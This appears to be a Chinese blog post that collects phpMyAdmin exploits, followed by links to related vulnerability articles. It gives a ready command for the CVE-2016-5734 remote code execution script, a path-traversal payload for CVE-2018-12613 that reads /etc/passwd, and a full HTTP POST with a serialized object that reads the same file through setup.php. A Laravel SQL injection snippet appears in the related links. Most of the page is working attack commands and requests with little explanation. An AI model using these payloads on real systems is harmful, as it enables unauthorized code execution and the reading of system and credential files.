phpmyadmin漏洞合集
1.PhpMyAdmin 4.0.x—4.6.2 远程代码执行 (CVE-2016-5734)
操作技巧:
去https://www.exploit-db.com/exploits/40185下载一个exp文件
执行python3 phpmyadmin.py -c 'system(id);' -u root -p root -d test http://192.168.68.129:8080
漏洞原理:
漏洞版本:
4.0.x version before 4.0.10.16
4.4.x version before 4.4.15.7
4.6.x version before 4.6.3 (actually because this version requires PHP5.5+, this vulnerability cannot be reproduced)
2.phpmyadmin远程文件包含漏洞(CVE-2018-12613)
操作技巧:
payload:http://192.168.68.129:8080/?target=db_datadict.php?/../../../../../../../../etc/passwd
漏洞原理:
在对传参的参数进行过滤时,需要过滤代码,但是传参点很多,需要多次输入过滤代码,开发人员考虑到使用将过滤代码写入过滤文件,通过include包含该文件,来达到一个过滤的目的,
假如这个包含的文件是可以控制的,那么就可能导致文件包含,该漏洞中,主要是因为对于传参包含文件的参数过滤时,只是对其内容进行检测白名单验证,只要target参数是白名单中的
参数,同时代码会对?后面的参数进行排除,所以构造出恶意代码target=db_datadict.php?/../../,还有一个原因就是,a?/../,比如在cmd命令行中,cd 到一个不存在的目录,会报错,
但是如果在其后加一个/../,系统会默认认为还是在当前目录,就不会对错误目录进行检查,也就不会报错;综上所有原因,导致了该漏洞的出现。
漏洞版本:phpMyAdmin 4.8.0和4.8.1
3.Phpmyadmin Scripts/setup.php反序列化漏洞 (WooYun-2016-199433)
操作技巧:
POST /scripts/setup.php HTTP/1.1
Host: 192.168.68.129:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: phpMyAdmin=pZb3cMlU0GbpnfHX0mRA4mbWlRd
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 80
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
漏洞原理:
漏洞版本:2.x
phpmyadmin漏洞合集相关推荐
- Laravel 漏洞合集
Laravel 漏洞合集 Laravel 存在SQL注入漏洞 poc: /test?email=1&id=1 union select user()# /test?email=1/`& ...
- Spring框架漏洞合集
Spring框架漏洞合集 Spring Security OAuth2 远程命令执行漏洞(CVE-2016-4977) 访问路径/oauth/authorize,会看到左上角有个绿色叶子的标志,一般都 ...
- spring漏洞合集 下
前言 现在的 java 开放的网站十个里面有九个是 spring 写的.网上对 spring 相关漏洞的资料很多,但是总结的文章却很少,再加上 spring 庞大的生态,每当看到 spring 相关网 ...
- 二十八种未授权访问漏洞合集(暂时最全)
目录 0x01 未授权漏洞预览 0x02 Active MQ 未授权访问 0x03 Atlassian Crowd 未授权访问 0x04 CouchDB 未授权访问 0x05 Docker 未授权访问 ...
- MetInfo最新版代码审计漏洞合集
最近想给 X 天贡献点插件,时常会去留意 seebug 的最新漏洞列表,发现最近 MetInfo 的漏洞上座率蛮高的,就挑它来代码审计了一波. seebug 上均是 MetInfo 6.0.0 版本的 ...
- zend及Slim 漏洞合集
zend漏洞 zend framework文件读取漏洞分析 Zend Framework 1.11.13.1.12.0之前版本内的(1) Zend_Dom, (2) Zend_Feed, (3) Ze ...
- Typo3及Nette漏洞合集
Typo3 漏洞 Typo3 反序例化漏洞 在表单中提交任意符合数组格式的输入,在后端代码中都会被解析,然后后端根据TCA来进行判断并处理.比如我们在提交表单中新增一个名为a[b][c][d],值为2 ...
- struts2远程代码执行漏洞合集
声明 好好学习,天天向上 S2-001 漏洞描述 因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中.例 ...
- Spring MVC漏洞合集
Spring MVC 目录穿越漏洞(CVE-2018-1271) 漏洞简介 2018年04月05日,Pivotal公布了Spring MVC存在一个目录穿越漏洞(CVE-2018-1271).Spri ...
最新文章
- springMVC教程--拦截器详解
- C++11并发编程:多线程std::thread
- Building wheel for mmcv-full (setup.py) ... error和OSError: CUDA_HOME environment variable is not set
- (cljs/run-at (JSVM. :browser) 简单类型可不简单啊~)
- STL札记2(序列容器vector、list、deque)
- Android:获取最近打开app列表
- 在Windows平台下的IIS中发布Django应用
- vue实现一个移动端屏蔽滑动的遮罩层
- CentOS5.2下安装yum
- 计算机控制面板设置命令,进入开始---设置--控制面板--声音和音频设备命令
- [数据压缩作业2]TIFF文件格式分析
- 盖茨与鲍尔默愤而诉Google 李开复离职有内情 -- ,买skype来控制桌面建立渠道吧
- css3的animation动画属性实现闹钟左右摇摆
- oracle分组查询最新的一条
- FLINK 极客时间
- 使用Arduino Motor Shield控制步进制电机
- Kurl——轻量化http-authentication在线暴破工具
- matlab cbfreeze,Matlab:如何在同一图中为不同的表面指定不同的色图/色块
- SQL开发中容易被忽略的BUG~
- 2015-年校内选拔-蓝桥杯C-(A组)赛题-勾股定理